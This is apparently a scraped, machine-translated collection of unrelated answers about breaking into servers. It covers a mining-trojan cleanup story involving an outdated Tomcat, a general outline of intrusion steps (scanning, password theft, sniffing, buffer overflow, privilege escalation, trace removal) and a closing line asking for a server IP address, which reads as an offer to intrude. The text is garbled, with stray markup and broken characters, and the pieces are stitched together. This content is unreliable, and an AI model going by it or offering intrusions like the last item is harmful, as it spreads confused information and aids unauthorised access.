1. -
all public cloud manufacturers explicitly require that they are not allowed to use the cloud server for mining, otherwise they will be banned
-
GPU is mainly used in mining. At present, GPU servers provided by public cloud manufacturers are more expensive, which is not cost-effective, so it is better to use special chips
< / OL > of course, some hackers intrude into the server through vulnerabilities, implant mining programs and scripts on it, and carry out mining operations, but this is illegal in itself
2. a new customer recently consulted with sine security company, saying that his server often fails to open the website of the card, and the remote connection to the server is extremely slow. Sometimes the Ping value reaches 300-500, and he often switches. After listening to the customer's words,
will generally judge that he has been attacked by CC + DDoS mixed traffic, It's strange to say that there is no traffic attack on the computer room. It's not a traffic attack, but it also causes the server card and website to fail to open. What kind of attack is this? In order to solve the problem of
client server card, we immediately arranged a security engineer to carry out security detection and deployment on his Linux server
{rrrrrrr}
Mining Trojan horse is also designed. If the mining process is forced to stop by customers, it will automatically start to continue mining to achieve uninterrupted mining.
careful inspection shows that it is through setting the hourly task plan, remotely downloading shell mining Trojan horse, and then executing, Check whether the current process exists or not. If not, start the Trojan horse to mine
a detailed security inspection was carried out on the client's Linux server. It was found that fortunately, there was no encrypted server data, and the worm was infected with the disease
virus. If the data was encrypted, the loss would be great. The client was a platform, and the client's data was very important. After finding out the mining Trojan horse,
do customers need to know how the server is attacked? Was the Trojan horse uploaded? It can prevent the attack
in the later stage
through the security detection and analysis of our security engineers, we found that the server uses Apache Tomcat environment, the open architecture of the platform is JSP + Oracle database, and Apache Tomcat uses the version of 2016, which leads to the serious remote command execution vulnerability of Apache, Through this vulnerability, the intruder can directly invade the server and get the administrator permission of the server,
sine security engineer immediately repairs the Apache vulnerability and clears the Trojan horse. So far, the problem has been solved, the client server
runs stably, and the network station opens normally
3. 
세 &# 51032; &# 49345;
4. Pass a shell to the server, there are characteristic codes, it is easy to find out
5. Vulnerability or local overflow and other methods will promote the user established by itself to administrator or root authority
6. This is a technology, there is no fixed way to crack the computer. You have to analyze a computer.
firewall, password, other protection software, etc.
there is no computer in the world that can't be broken. It just depends on who breaks it.
in the case of not knowing the other computer, you just use the method to set it one by one.
if you are a master, you will use the system vulnerability to do damage
7. Methods and means of attack (1) find the target and obtain information. There's a clear target. Find the machine with vulnerability and attack after finding it. That is to say, one is to have goals first, and the other is to have tools first. Generally speaking, such as "worm event", more belong to the latter. The integration of viruses and hackers to make the attack automatic is a popular trend at present. A lot of problems, the past manual virus, to survive through propagation, delete data. After finding the "back door", hackers use these virus means to attack. Scanning is a common way to find loopholes. Then, which services must be provided and which services do not need to be provided. For example, some function services that users do not need will exist in the system as options ring installation, so there may be vulnerabilities in the system. Therefore, the more services you receive, the more problems you may have. Therefore, opacity, frequent changes, irregular upgrade and dynamic password make the system relatively safe in the change. At present, in many cases, users do not understand the loopholes in their own system, some congenital unreasonable defects exist in the system, if someone attacks this weakness, it will become a problem. So, first, you need to understand your own system. Version information is also important. Different versions have different weaknesses and may become targets of attack. The key files of the system are also important, from which the user name and password can be extracted 2) The method of getting system sensitive files. Anonymous FTP, TFTP, etc. TFTP is used in many worm, strong attack, weak password and other means 3) Get initial access. Such as the use of monitoring means to steal passwords. Anonymous FTP, using the default password or trust relationship (password) between hosts. Use email to tell you that the attachment is an upgrade package, but it may be a virus. Take advantage of technical loopholes 4) Get the super user password. Such as sniffer, buffer overflow and other means to obtain privileges. At present, the development of security theory has attracted attention. Software engineering and software security have become a parallel way. The larger the software, the more vulnerabilities. At present, someone in China has found six vulnerabilities in Microsoft. It is said that after this discovery, it was directly published on the Internet, but Microsoft has not found a corresponding solution. So it brings great risks to users 5) Remove traces. Use after destroying the system 6) The usual technique. TFTP, denial of service (distributed denial of service), sniffer, buffer overflow, syn synchronization storm (send out a large number of connection requests, but regardless of the connection result, occupy a large number of user resources and crash.)
8. Generally, it is through detecting the corresponding vulnerabilities of the server website. If the source code has no relevant vulnerabilities, you can try the server or sidenote intrusion. Generally, it is a matter of time.
9. Send me the server IP address
